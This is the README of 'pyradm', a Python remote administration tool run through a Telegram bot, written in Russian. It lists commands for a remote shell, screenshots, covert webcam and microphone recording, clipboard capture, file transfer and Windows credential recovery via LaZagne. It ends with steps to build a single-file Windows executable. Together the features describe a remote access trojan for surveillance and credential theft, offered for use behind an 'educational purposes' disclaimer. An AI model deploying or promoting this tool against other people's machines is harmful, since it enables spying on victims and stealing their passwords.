
🔮 Инструмент удаленного администрирования на Python через Telegram
Инструмент для удаленного администрирования через Telegram (кроссплатформенный)
Написан с ❤️ на python3 + aiogram3
https://t.me/wh_lab
Скриншоты
Вся информация, содержащаяся в этом репозитории, предоставлена только в образовательных и исследовательских целях
Автор не несет ответственности за любое незаконное использование этого инструмента
🔗 Большая благодарность проекту LaZagne
🔗 Все поддерживаемое программное обеспечение
/start - start pyradm
/help - help
/shell - shell commands
/sc - screenshot
/download - download (abs. path)
/info - system info
/ip - public ip address and geolocation
/ps - process list
/webcam 5 - record video (secs)
/webcam - screenshot from camera
/fm - filemanager
/fm /home or /fm C:\
/mic 10 - record audio from mic
/clip - get clipboard data
/winpass - credentials recovery
Press button to download file
Send any file as file for upload to target
git clone https://github.com/akhomlyuk/pyradm.gitcd pyradmpip3 install -r requirements.txtPut bot token to cfg.py, ask @Bothfatherpython3 main.pyPut bot token to cfg.pypip install nuitkanuitka --mingw64 --onefile --follow-imports --remove-output -o pyradm.exe main.py
